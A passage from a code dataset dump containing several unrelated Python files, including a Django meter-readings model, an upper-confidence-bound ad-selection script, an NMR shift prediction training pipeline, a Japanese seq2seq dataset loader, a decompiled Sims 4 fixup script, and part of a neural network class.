\"{}\".format(self.name)\n\n class Meta:\n verbose_name = \"Resource type\"\n verbose_name_plural = \"Resource types\"\n\n\nclass Meters(models.Model):\n name = models.CharField(max_length=64, unique=True, blank=False, null=False)\n resource_type = models.ForeignKey(ResourceType, null=True, on_delete=models.SET_NULL)\n unit = models.CharField(max_length=10, blank=False, null=False)\n\n def __str__(self):\n return \"{}\".format(self.name)\n\n def get_absolute_url(self):\n return \"/meters/{}\".format(self.id)\n\n def get_last_reading(self):\n \"\"\" Return list of last reading data - record, date, consumption\"\"\"\n return Records.objects.filter(meter__id=self.id).last()\n\n def consumptions_recalculation(self, start_date=date(1970,1,1)):\n \"\"\" Function which perform recalculation of consuptions\n for records where date >= instance.date \"\"\"\n\n records_list = 
Records.objects.filter(meter__id=self.id,\n                                                     date__gte=start_date).order_by('date')\n        try:\n            last_record = Records.objects.filter(date__lt=start_date).order_by('date').last().record\n        except:\n            last_record = 0\n\n        obj_list = []\n        for record in records_list:\n            if last_record == 0:\n                last_record = record.record\n            record.consumption = record.record - last_record\n            last_record = record.record\n            obj_list.append(record)\n\n        Records.objects.filter(date__in=records_list.values_list('date', flat=True)).delete() # delete previous records\n        Records.objects.bulk_create(obj_list) # create multiple objects in one call to DB\n\n    def import_readings(self, readings_table): #readings_table - pandas DataFrame\n        readings_table = readings_table.fillna(0) # replace NaN with 0\n        obj_list = []\n\n        for index, row in readings_table.iterrows():\n            obj_list.append(Records(meter=self,\n                                    date=row.DATE,\n                                    record=row.VALUE,\n                                    consumption=0))\n\n        Records.objects.filter(date__in=readings_table.DATE.tolist()).delete() # delete previous records\n        Records.objects.bulk_create(obj_list) # create multiple objects in one call to DB\n        self.consumptions_recalculation(readings_table.DATE.min())\n\n\n        # readings_table = readings_table.sort_values(by=['DATE'], ascending=True) # Sorting values by date (ascending)\n        # readings_table['CONSUMPTION'] = readings_table['VALUE'].diff() # Performing calculation of consumptions\n\n    class Meta:\n        verbose_name = \"Meter\"\n        verbose_name_plural = \"Meters\"\n\n\nclass Records(models.Model):\n    meter = models.ForeignKey(Meters, null=True, on_delete=models.SET_NULL)\n    date = models.DateField(blank=False, null=False)\n    record = models.FloatField(default=0)\n    consumption = models.FloatField(default=0)\n\n\n    class Meta:\n        ordering = ['date']\n        get_latest_by = 'date'\n\n\n\n\n\n\n","sub_path":"django_meters/meters/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"229754948","text":"\n\n#class header\nclass _CENSOR():\n\tdef __init__(self,): \n\t\tself.name = \"CENSOR\"\n\t\tself.definitions = [u'to remove anything offensive from books, films, etc., or to remove parts considered unsuitable from private letters, especially ones sent during war or from a prison: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_censor.py","file_name":"_censor.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"241616027","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 12 11:05:32 2020\n\n@author: guillem\n\"\"\"\n\n# UPPER CONFIDENCE BOUND (UCB)\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Load the dataset\n\ndf = pd.read_csv(\"/home/guillem/CursosML/machinelearning-az-master/datasets/Part 6 - Reinforcement Learning/Section 32 - Upper Confidence Bound (UCB)/Ads_CTR_Optimisation.csv\")\n\n# Implement a random selection\nimport random\nN = 10000\nd = 10\nads_selected = []\ntotal_reward = 0\nfor n in range(0, N):\n    ad = random.randrange(d)\n    ads_selected.append(ad)\n    reward = df.values[n, ad]\n    total_reward = total_reward + reward\n    \n# Visualize a histogram of the results\n\nplt.subplots(1, 1, figsize = (10 , 10))\nplt.hist(ads_selected)\nplt.title(\"Histogram of selected ads\")\nplt.xlabel(\"Ads\")\nplt.ylabel(\"Number of times selected\")\nplt.show()\n\n# Let's try to beat the baseline above\n\n# Upper confidence bound algorithm\nN = df.shape[0]\nd = df.shape[1]\n\nnum_selection = [0] * d\nsum_rewards = [0] * d\nads_selected = []\ntotal_reward = 0\nfor n in range(0, N):\n    max_upper_bound = 0\n    ad = 0\n    for i in range(0, d):\n        if(num_selection[i] > 0):\n            average_reward = sum_rewards[i]/num_selection[i]\n            delta_i = np.sqrt(3/2*np.log(n+1)/num_selection[i])\n            upper_bound = average_reward + delta_i\n            \n        else:\n            upper_bound = 1e400\n        \n        if upper_bound > max_upper_bound:\n            max_upper_bound = upper_bound\n            ad = i\n    ads_selected.append(ad)\n    num_selection[ad] = num_selection[ad] + 1\n    reward = df.values[n, ad]\n    sum_rewards[ad] = sum_rewards[ad] + reward\n    total_reward = total_reward + reward\n    \n    \n# Visualize with a histogram\nplt.subplots(1, 1, figsize = (10, 10))\nplt.hist(ads_selected)\nplt.title(\"Histogram of ads\")\nplt.xlabel(\"Ad ID\")\nplt.ylabel(\"Ad display frequency\")\nplt.show()","sub_path":"UpperConfidenceBound.py","file_name":"UpperConfidenceBound.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"410429823","text":"import numpy as np\nimport pickle\nimport pandas as pd\nfrom ruffus import * \nfrom tqdm import tqdm\nfrom rdkit import Chem\nimport pickle\nimport os\n\nfrom glob import glob\nimport json \n\nimport time\nimport util\nimport nets\n\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem import rdMolDescriptors as rdMD\n\nimport torch\nfrom torch import nn\nfrom tensorboardX import SummaryWriter\n\nfrom tqdm import tqdm\nfrom netdataio import * \nimport netdataio\nimport itertools\nimport graph_conv_many_nuc_util\nfrom graph_conv_many_nuc_util import move\n\nDATASET_DIR = \"../../data/RPNMRData/graph_conv_many_nuc_pipeline.datasets\"\n\ntd = lambda x : os.path.join(DATASET_DIR, x)\n\n\nSPECT_SET = '13C' # or '1H'\n\nTENSORBOARD_DIR = f\"logs.{SPECT_SET}\"\n\nCHECKPOINT_DIR = \"checkpoints\" \nMAT_PROPS= 'aromatic'\nDATASET_NAME = 'nmrshiftdb_hconfspcl_nmrshiftdb'\n#DATASET_NAME = 'qm9'\nimport wandb\n\nwandb.init(name=\"Train_try1\", project=\"RPNMR\",sync_tensorboard=True)\n\nif SPECT_SET == '13C':\n    NUC_LOSS_SCALE = {'13C' : 1.0} \n    NUC_STD_SCALE = {'13C' : 1.0} \n    STD_REGULARIZE = 0.1\nelse:\n    NUC_LOSS_SCALE = {'1H' : 1.0/20.0}\n    NUC_STD_SCALE = {'1H' : 10.0} \n    STD_REGULARIZE = 0.01\n\ntgt_max_n = 64\nMAX_EPOCHS = 10000\n#MAX_EPOCHS = 1\n\nEXP_NAME = f\"good_{SPECT_SET}\"\n\n\ndef create_validate_func(tgt_nucs):\n    def val_func(res): # val, mask, truth):\n        val = res['pred_val']\n        mask = res['pred_mask']\n        truth = res['pred_truth']\n        res = {}\n        for ni, n in enumerate(tgt_nucs):\n            delta = (val[:, :, ni] - truth[:, :, ni])[mask[:, :, ni] > 0].flatten()\n            res[f\"{n}/test_std_err\"] = np.std(delta)\n            res[f\"{n}/test_max_error\"] = np.max(np.abs(delta))\n            res[f\"{n}/test_mean_abs_err\"] = np.mean(np.abs(delta))\n            res[f\"{n}/test_abs_err_90\"] = np.percentile(np.abs(delta), 90)\n        return res\n    return val_func\n\ndef create_uncertain_validate_func(tgt_nucs):\n    def val_func(res): # val, mask, truth):\n        mu = res['pred_mu']\n        std = res['pred_std'] \n        mask = res['pred_mask']\n        truth = res['pred_truth']\n        res = {}\n        for ni, n in enumerate(tgt_nucs):\n            delta = (mu[:, :, ni] - truth[:, :, ni])[mask[:, :, ni] 
> 0].flatten()\n masked_std = (std[:, :, ni])[mask[:, :, ni] > 0].flatten()\n res[f\"{n}/test_std_err\"] = np.std(delta)\n res[f\"{n}/test_max_error\"] = np.max(np.abs(delta))\n res[f\"{n}/test_mean_abs_err\"] = np.mean(np.abs(delta))\n res[f\"{n}/test_abs_err_90\"] = np.percentile(np.abs(delta), 90)\n res[f\"{n}/std/mean\"] = np.mean(masked_std)\n res[f\"{n}/std/min\"] = np.min(masked_std)\n res[f\"{n}/std/max\"] = np.max(masked_std)\n\n return res\n return val_func\n\n\n\nnet_params_base = {'init_noise' : 1e-2, \n 'resnet' : True, \n 'int_d' : 2048, \n 'layer_n' : 10, \n 'GS' : 4, \n 'agg_func' : 'goodmax', \n 'force_lin_init' : True, \n 'g_feature_n' : -1, \n 'resnet_out' : True, \n 'out_std' : True, \n 'graph_dropout' : 0.0, \n 'resnet_d': 128, \n 'OUT_DIM' : 1, # update\n}\n\nopt_params_base = {'amsgrad' : False, \n 'lr' : 1e-4,\n 'weight_decay' : 1e-6, \n 'scheduler_gamma' : 0.95, \n 'eps' : 1e-8, \n 'scheduler_step_size' : 10}\n\n\n\ndef params():\n CV_I = int(os.environ.get(\"CV_I\", 0))\n infile = td('graph_conv_many_nuc_pipeline.data.{}.{}.{}.{:d}.{:d}.mol_dict.pickle'.format(SPECT_SET, DATASET_NAME, \n MAT_PROPS, tgt_max_n, CV_I))\n \n seed = 1234 \n\n outfile = f\"respredict_pipeline_{SPECT_SET}.{seed}.{CV_I}.out\"\n \n\n\n yield infile, outfile, seed\n\n@mkdir(CHECKPOINT_DIR)\n@files(params)\ndef train(infile, outfile, seed):\n print(\"infile:\", infile)\n np.random.seed(seed)\n\n d = pickle.load(open(infile, 'rb'))\n\n tgt_nucs = d['tgt_nucs']\n MAX_N = d['MAX_N']\n print(\"TGT_NUCS=\", tgt_nucs)\n print(\"output is\", outfile)\n USE_CUDA = True\n\n mu_scale = []\n std_scale = []\n for tn in tgt_nucs:\n for k, v in NUC_LOSS_SCALE.items():\n if k in tn:\n mu_scale.append(v)\n for k, v in NUC_STD_SCALE.items():\n if k in tn:\n std_scale.append(v)\n assert len(mu_scale) == len(tgt_nucs)\n assert len(std_scale) == len(tgt_nucs)\n print(\"NUC_LOSS_SCALE=\", NUC_LOSS_SCALE)\n print(\"mu_scale=\", mu_scale)\n print(\"std_scale=\", std_scale)\n print(\"tgt_nucs=\", tgt_nucs)\n\n ### Create datasets and data loaders\n\n BATCH_SIZE = 16\n\n dataset_hparams = graph_conv_many_nuc_util.DEFAULT_DATA_HPARAMS\n\n ds_train, ds_test = graph_conv_many_nuc_util.make_datasets({'filename' : infile}, \n dataset_hparams)\n \n dl_train = torch.utils.data.DataLoader(ds_train, batch_size=BATCH_SIZE, \n shuffle=True,pin_memory=True)\n dl_test = torch.utils.data.DataLoader(ds_test, batch_size=BATCH_SIZE, \n shuffle=True,pin_memory=True)\n\n net_params = net_params_base.copy()\n opt_params = opt_params_base.copy()\n\n net_params['g_feature_n'] = ds_test[0][1].shape[-1]\n net_params['OUT_DIM'] = len(tgt_nucs)\n\n use_std = True \n \n net = nets.GraphVertModel(**net_params)\n net = move(net, USE_CUDA)\n\n for n, p in net.named_parameters():\n print(n, p.shape)\n loss_config = {'std_regularize' : STD_REGULARIZE, \n 'mu_scale' : mu_scale, \n 'std_scale' : std_scale}\n\n if use_std:\n std_regularize = loss_config['std_regularize']\n mu_scale = move(torch.Tensor(loss_config['mu_scale']), USE_CUDA)\n std_scale = move(torch.Tensor(loss_config['std_scale']), USE_CUDA)\n criterion = nets.NormUncertainLoss(mu_scale, \n std_scale,\n std_regularize = loss_config['std_regularize'])\n else:\n criterion = nets.MaskedMSELoss()\n\n validate_func = create_uncertain_validate_func(tgt_nucs)\n\n optimizer = torch.optim.Adam(net.parameters(), lr=opt_params['lr'], \n amsgrad=opt_params['amsgrad'], \n eps=opt_params['eps'], \n weight_decay=opt_params['weight_decay'])\n\n \n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 
\n step_size=opt_params['scheduler_step_size'], \n gamma=opt_params['scheduler_gamma'])\n\n MODEL_NAME = \"{}.{:08d}\".format(EXP_NAME,int(time.time() % 1e8))\n MODEL_NAME = \"best_model\"\n \n checkpoint_filename = os.path.join(CHECKPOINT_DIR, MODEL_NAME + \".{epoch_i:08d}\")\n print(\"checkpoint:\", checkpoint_filename)\n checkpoint_func = graph_conv_many_nuc_util.create_checkpoint_func(10, checkpoint_filename)\n \n writer = SummaryWriter(\"{}/{}\".format(TENSORBOARD_DIR, MODEL_NAME))\n\n metadata = {'dataset_hparams' : dataset_hparams, \n 'net_params' : net_params, \n 'opt_params' : opt_params, \n 'infile' : infile, \n 'tgt_nucs' : tgt_nucs, \n 'max_n' : MAX_N,\n 'loss_params' : loss_config}\n\n json.dump(metadata, open(os.path.join(CHECKPOINT_DIR, MODEL_NAME + \".json\"), 'w'), \n indent=4)\n print(json.dumps(metadata, indent=4))\n pickle.dump(metadata, \n open(os.path.join(CHECKPOINT_DIR, MODEL_NAME + \".meta\"), 'wb'))\n\n graph_conv_many_nuc_util.generic_runner(net, optimizer, scheduler, criterion, \n dl_train, dl_test, \n MAX_EPOCHS=MAX_EPOCHS, \n USE_CUDA=USE_CUDA, writer=writer, \n validate_func= validate_func, \n checkpoint_func= checkpoint_func)\n\n pickle.dump({'net_params' : net_params, \n 'opt_params' : opt_params, \n 'loss_params' : loss_config}, \n open(outfile, 'wb'))\n\nif __name__ == \"__main__\":\n pipeline_run([train])\n\n\n","sub_path":"source/forwardModel/respredict_pipeline.py","file_name":"respredict_pipeline.py","file_ext":"py","file_size_in_byte":8711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"52193606","text":"import logging\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List\n\nfrom rhoknp import Document\nfrom transformers import BatchEncoding, PreTrainedTokenizerBase\nfrom transformers.utils import PaddingStrategy\n\nfrom kwja.datamodule.datasets.base import BaseDataset\nfrom kwja.datamodule.examples import Seq2SeqExample\nfrom kwja.utils.constants import FULL_SPACE_TOKEN, IGNORE_INDEX, NEW_LINE_TOKEN\nfrom kwja.utils.logging_util import track\nfrom kwja.utils.seq2seq_format import get_seq2seq_format\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass(frozen=True)\nclass Seq2SeqModuleFeatures:\n example_ids: int\n src_text: str\n input_ids: List[int]\n attention_mask: List[int]\n seq2seq_labels: List[int]\n\n\nclass Seq2SeqDataset(BaseDataset[Seq2SeqExample, Seq2SeqModuleFeatures]):\n def __init__(\n self,\n path: str,\n tokenizer: PreTrainedTokenizerBase,\n max_src_length: int,\n max_tgt_length: int,\n ext: str = \"knp\",\n ) -> None:\n super().__init__(tokenizer, max_src_length)\n self.path = Path(path)\n\n self.max_src_length: int = max_src_length\n self.max_tgt_length: int = max_tgt_length\n\n self.documents: List[Document] = self._load_documents(self.path, ext)\n self.examples: List[Seq2SeqExample] = self._load_examples(self.documents)\n\n @staticmethod\n def _load_documents(document_dir: Path, ext: str = \"knp\") -> List[Document]:\n documents = []\n for path in track(sorted(document_dir.glob(f\"*.{ext}\")), description=\"Loading documents\"):\n # TODO: fix document files that raise exception\n try:\n documents.append(Document.from_knp(path.read_text()))\n except AssertionError:\n logger.warning(f\"{path} is not a valid knp file.\")\n return documents\n\n def _load_examples(self, documents: List[Document]) -> List[Seq2SeqExample]:\n examples: List[Seq2SeqExample] = []\n example_id: int = 0\n for document in track(documents, description=\"Loading 
examples\"):\n for sentence in document.sentences:\n src_encoding: BatchEncoding = self.tokenizer(\n \"解析:\" + sentence.text,\n padding=PaddingStrategy.MAX_LENGTH,\n truncation=False,\n max_length=self.max_src_length,\n )\n if len(src_encoding.input_ids) > self.max_src_length:\n logger.warning(f\"Length of source sentence is too long: {sentence.text}\")\n continue\n tgt_encoding: BatchEncoding = self.tokenizer(\n get_seq2seq_format(sentence).replace(\"\\n\", NEW_LINE_TOKEN),\n padding=PaddingStrategy.MAX_LENGTH,\n truncation=False,\n max_length=self.max_tgt_length,\n )\n if len(tgt_encoding.input_ids) > self.max_tgt_length:\n logger.warning(f\"Length of target sentence is too long: {sentence.text}\")\n continue\n examples.append(\n Seq2SeqExample(\n example_id=example_id,\n src_text=sentence.text.strip().replace(\"\\u3000\", FULL_SPACE_TOKEN),\n src_encoding=src_encoding,\n tgt_encoding=tgt_encoding,\n sid=sentence.sid,\n )\n )\n example_id += 1\n if len(examples) == 0:\n logger.error(\n f\"No examples to process. Make sure there exist any documents in {self.path} and they are not too long.\"\n )\n return examples\n\n def encode(self, example: Seq2SeqExample) -> Seq2SeqModuleFeatures:\n seq2seq_labels: List[int] = [\n (seq2seq_tag if seq2seq_tag != self.tokenizer.pad_token_id else IGNORE_INDEX)\n for seq2seq_tag in example.tgt_encoding.input_ids\n ]\n assert len(seq2seq_labels) == self.max_tgt_length\n\n return Seq2SeqModuleFeatures(\n example_ids=example.example_id,\n src_text=example.src_text,\n input_ids=example.src_encoding.input_ids,\n attention_mask=example.src_encoding.attention_mask,\n seq2seq_labels=seq2seq_labels,\n )\n","sub_path":"src/kwja/datamodule/datasets/seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"175749595","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\sims\\fixup\\sim_info_appearance_fixup_action.py\n# Compiled at: 2020-11-17 03:11:42\n# Size of source mod 2**32: 2227 bytes\nfrom buffs.appearance_modifier.appearance_modifier import AppearanceModifier, AppearanceModifierPriority\nfrom sims.fixup.sim_info_fixup_action import _SimInfoFixupAction\nfrom sims4.tuning.tunable import TunableList, TunableCasPart, Tunable\nfrom cas.cas import OutfitOverrideOptionFlags\n\nclass _SimInfoAppearanceFixupAction(_SimInfoFixupAction):\n FACTORY_TUNABLES = {'cas_parts_add':TunableList(description='\\n All CAS parts in this list will be applied to the sim permanently.\\n ',\n tunable=TunableCasPart()), \n 'apply_to_all_outfits':Tunable(description='\\n If checked, the appearance modifiers will be applied to all outfits,\\n otherwise they will only be applied to the current outfit.\\n ',\n tunable_type=bool,\n default=True)}\n\n def __call__(self, sim_info):\n modifiers = []\n for cas_part in self.cas_parts_add:\n modifier = AppearanceModifier.SetCASPart(cas_part=cas_part, should_toggle=False, replace_with_random=False,\n update_genetics=True,\n _is_combinable_with_same_type=True,\n remove_conflicting=False,\n outfit_type_compatibility=None,\n appearance_modifier_tag=None,\n expect_invalid_parts=False)\n modifiers.append(modifier)\n\n sim_info.appearance_tracker.apply_permanent_appearance_modifiers(modifiers, self.fixup_guid, AppearanceModifierPriority.INVALID, 
self.apply_to_all_outfits, OutfitOverrideOptionFlags.DEFAULT)","sub_path":"Scripts/simulation/sims/fixup/sim_info_appearance_fixup_action.py","file_name":"sim_info_appearance_fixup_action.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"184676576","text":"import os\nimport sys\nimport time\nimport math\nimport copy\nimport random\nimport torch\nimport numpy as np\nimport pandas as pd\nimport argparse\nfrom sklearn import linear_model\nfrom module_time import time_since\n\n\nclass Network_SDL(object):\n def __init__(self, sizes, adj_matrix, parent_child, child_parent, residual_set):\n # layer_predictor_number/sizes: such like [7, 3, 1]\n # adj_matrix: adjacent matrix\n # parent_child: parent child dict\n # chile_parent: child parent dict\n\n np.random.seed(12345)\n\n self.sizes = sizes\n self.num_layers = len(sizes)\n\n self.parent_child = parent_child\n self.child_parent = child_parent\n\n self.residual_set = residual_set\n # biased: sizes[i]*1\n self.biases = [np.random.randn(i, 1) for i in self.sizes[1:]]\n\n # adjacent matrix\n self.adj_matrix = adj_matrix\n\n # calculate each layer which nodes will be left.\n self.list_of_node = self.layer_node_number(parent_child, child_parent, sizes)\n\n # Initialization weight matrix\n self.weights_ur, self.weights = self.weight_matrix_init(\n adj_matrix, self.sizes, self.list_of_node)\n\n # Calculate each layer's child and parent dictionary\n self.index_child, self.index_parent = self.pc_dict(self.weights_ur, self.sizes)\n\n def SGD(self, training_data, validation_data, test_data,\n n_train, n_val, n_test, end_epoch, mini_batch_size, val_mini_batch_size, eta):\n # use stochastic gradient descent method to optimize the objective function\n\n # training_data: training data\n # epochs: learning epochs\n # mini_batch_size\n # eta: learning rate, lr\n # validation_data\n # test_data\n\n # loss dict\n loss_training = []\n loss_validation = []\n\n # temp_w = [np.zeros([y, x]) for x, y in zip(self.sizes[:-1], self.sizes[1:])]\n # temp_b = [np.zeros([y, 1]) for y in self.sizes[1:]]\n\n # calculate time\n start = time.time()\n\n group = n_train / mini_batch_size * end_epoch\n\n print(\"\\nStart training\")\n # random select training data into mini batch\n for epoch in range(end_epoch):\n step = 0\n random.shuffle(training_data)\n\n # create mini_batches\n mini_batches = [list(training_data)[k:k + mini_batch_size]\n for k in range(0, n_train, mini_batch_size)]\n\n # use mini_batch to calculate loss\n for mini_batch in mini_batches:\n step += 1\n # Organize data\n mini_batch = self.data_organize(mini_batch)\n\n # Update parameters\n self.weights, self.biases = self.update_weight(mini_batch, eta)\n\n # Calculate loss\n loss_training.append(self.evaluate(mini_batch))\n\n # Print training loss\n print_training = 'Epoch: %d / %d, Accumulate Time to End: %s, ' \\\n '(Batch: %d / Batches num: %d, Percent Run: %.2f%%), '\\\n 'Training MSE Loss: %.4f' % (epoch+1, end_epoch, time_since(start,\n (step+epoch*n_train/mini_batch_size)/group),\n step, n_train / mini_batch_size,\n (epoch * (n_train / mini_batch_size) + step)/group * 100,\n self.evaluate(mini_batch))\n print(print_training)\n sys.stdout.flush()\n # print(self.weights[-2], self.biases[-2])\n\n ######################################################################\n # Use validation method to select the best parameters\n ######################################################################\n\n # Create 
mini_batches\n val_mini_batches = [list(validation_data)[k:k + val_mini_batch_size]\n for k in range(0, n_test, val_mini_batch_size)]\n\n # use mini_batch to calculate loss\n loss_val_all = 0\n loss_val_part = 0\n loss_val_average = 0\n\n for val_mini_batch in val_mini_batches:\n # transform data format\n val_mini_batch = self.data_organize(val_mini_batch)\n\n # Keep loss_validation\n loss_val_part = self.evaluate(val_mini_batch)\n loss_val_all += loss_val_part\n\n # average loss of val\n loss_val_average = loss_val_all/len(val_mini_batches)\n\n # Save validation_loss\n loss_validation.append(loss_val_average)\n # Print training loss\n print_val = '\\nValidation: Epoch: %d / %d, Validation MSE Loss: %.4f' % (epoch+1, end_epoch, loss_val_average)\n print(print_val)\n sys.stdout.flush()\n\n # check points\n # First create a model check point folder\n if not os.path.exists('model_checkpoint_train'):\n os.makedirs('model_checkpoint_train')\n\n checkpoint = {\n 'epoch': epoch+1,\n 'learning_rate': eta,\n 'w': self.weights,\n 'biases': self.biases,\n 'validation_loss': loss_val_average\n }\n\n # Need change the name of saving the model parameter name\n save_epoch = epoch + 1\n model_name = os.path.join('model_checkpoint_train/', \"SDL_epoch_%d.pt\" % save_epoch)\n\n # Save model parameters\n torch.save(checkpoint, model_name)\n print(\"Save model as %s \\n\" % model_name)\n\n # For test\n # we can select the minimal of validation then use if for test result.\n return loss_validation\n\n def data_organize(self, mini_batch):\n # transform data from [[x1,y1], [x2,y2]] to [[x1, x2], [y1, y2]]\n\n # mini_batch_size\n n = len(mini_batch)\n\n # predictor size\n m = mini_batch[0][0].shape[0]\n\n x = []\n y = []\n for i in range(n):\n x.append(mini_batch[i][0])\n y.append(mini_batch[i][1])\n\n x = np.reshape(x, (n, m))\n y = np.reshape(y, (n, 1))\n return [x, y]\n\n def update_weight(self, mini_batch, eta):\n # update data weights and bias\n\n # get X design matrix and response y vector\n x_matrix = mini_batch[0]\n y_vector = mini_batch[1]\n\n # get delta variable; x: m*n, y: 1*n\n delta_nabla_b, delta_nabla_w = self.backprop(np.transpose(x_matrix), np.transpose(y_vector))\n\n # update weights and biases\n weights = [w - (eta * nw)\n for w, nw in zip(self.weights, delta_nabla_w)]\n biases = [b - (eta * nb)\n for b, nb in zip(self.biases, delta_nabla_b)]\n\n return weights, biases\n\n def layer_node_number(self, parent_child, child_parent, sizes):\n # calculate each layer node\n\n list_of_node = [[] for _ in range(len(sizes))]\n list_of_node[-1] = [0]\n\n for k in range(len(sizes) - 1):\n list_of_node[k] = list(parent_child.keys())\n if k == len(sizes) - 1:\n break\n\n delete_number = []\n parent_to_null = []\n\n for i in list_of_node[k]:\n if parent_child[i] == []:\n # avoid root nodes\n if child_parent[i] == []:\n continue\n # delete nodes who don't have child\n else:\n # nodes need to be deleted\n delete_number.append(i)\n # next step leaf nodes\n parent_to_null.append(child_parent[i])\n\n # update parent-child dict\n for i in list(list_of_node[k]):\n # prepare delete nodes who don't have children\n if parent_child[i] == []:\n # avoid root nodes\n if child_parent[i] == []:\n break\n else:\n del parent_child[i]\n\n # set parents to next layer child\n for i in range(len(delete_number)):\n for j in parent_to_null[i]:\n parent_child[j] = []\n\n return list_of_node\n\n def weight_matrix_init(self, adj_matrix, sizes, list_of_node, scale = False):\n # Initialization weight matrix, created w_final\n # return 
w_final\n\n # Define fixed random effect\n np.random.seed(12345)\n\n # how many weight matrix needed\n weight_mat_number = len(sizes) - 1\n\n # double sizes for [x, epsilon] use\n sizes_double = []\n for i in range(weight_mat_number + 1):\n sizes_double.append(sizes[i] * 2)\n\n # weights\n w_mat = [np.random.randn(y, x) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n\n # Scale weight parameters smaller or larger\n if scale == True:\n for i in range(weight_mat_number):\n w_mat[i] = w_mat[i]/3\n\n # list_of_node from [0,1,2] change to [0,1,2,0,1,2], leave the last to 1 * 6 (1*3|1*3)\n for i in range(self.num_layers):\n list_of_node[i].extend(list_of_node[i])\n\n # keep each layer node name for W_hat\n list_of_node_name = [[] for _ in range(weight_mat_number + 1)]\n list_of_node_name[-1] = map(lambda i: 'x' + str(i), list_of_node[-1])\n for j in range(len(list_of_node)):\n list_of_node_name[j] = list(map(lambda i: 'x_' + str(i), list_of_node[j][:int(len(list_of_node[j]) / 2)]))\n list_of_node_name[j].extend(list(map(lambda i: 'epsilon_' + str(i),\n list_of_node[j][int(len(list_of_node[j]) / 2):])))\n\n # Give Adjacent column and row name,\n # adj_mat_NAME [ epsilon_0, epsilon_1, ...,\n # x_0,\n # x_1,\n # ...\n # ]\n # and is DataFrame\n adj_mat_NAME = [[] for _ in range(weight_mat_number + 1)]\n adj_mat_NAME[0] = pd.DataFrame(adj_matrix, index=list_of_node_name[0][: int(len(list_of_node_name[0])/2)],\n columns=list_of_node_name[0][int(len(list_of_node_name[0])/2):])\n\n # Create W_hat matrix for each layer\n W_hat = [np.zeros([y, x]) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n W_hat_copy = [np.zeros([y, x]) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n\n # Give W_hat matrix column and row name:\n for i in range(weight_mat_number):\n w_mat[i] = pd.DataFrame(w_mat[i], index=list_of_node_name[i + 1], columns=list_of_node_name[i])\n W_hat[i] = pd.DataFrame(W_hat[i], index=list_of_node_name[i + 1], columns=list_of_node_name[i])\n W_hat_copy[i] = pd.DataFrame(W_hat_copy[i], index=list_of_node_name[i + 1], columns=list_of_node_name[i])\n\n # Initialization W_hat matrix: left and right\n # Layer i\n for i in range(weight_mat_number):\n # Right half of W\n for j in list_of_node_name[i][int(len(list_of_node_name[i])/2):]:\n # Upper half of W\n for k in list_of_node_name[i + 1][:int(len(list_of_node_name[i + 1])/2)]:\n if adj_mat_NAME[i][j][k] != 0:\n W_hat[i][j][k] = w_mat[i][j][k]\n W_hat_copy[i][j][k] = w_mat[i][j][k]\n\n # delete x_variable: row\n delete_number_of_row = list(set(list_of_node_name[i][:int(len(list_of_node_name[i])/2)]).symmetric_difference(\n set(list_of_node_name[i+1][:int(len(list_of_node_name[i+1])/2)])))\n # delete epsilon_variable: column\n delete_number_of_col = list(set(list_of_node_name[i][int(len(list_of_node_name[i])/2):]).symmetric_difference(\n set(list_of_node_name[i + 1][int(len(list_of_node_name[i + 1])/2):])))\n # Update adjacent matrix layer by layer\n adj_mat_NAME[i + 1] = adj_mat_NAME[i].drop(delete_number_of_row) # row\n adj_mat_NAME[i + 1] = adj_mat_NAME[i + 1].drop(delete_number_of_col, axis=1) # column\n\n\n # Then W_hat will be transformed from DataFrame to ndarray matrix: w_nda, W_HAT_copy ndarray\n w_nda = [np.zeros([y, x]) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n w_nda_u = [np.zeros([y, x]) for x, y in zip(sizes_double[:-1], sizes_double[1:])]\n\n for i in range(weight_mat_number):\n w_nda[i] = W_hat[i].values\n w_nda_u[i] = W_hat_copy[i].values\n\n # Delete the last row: [x_0, epsilon_0] -> [x_0]\n w_mat[-1] = 
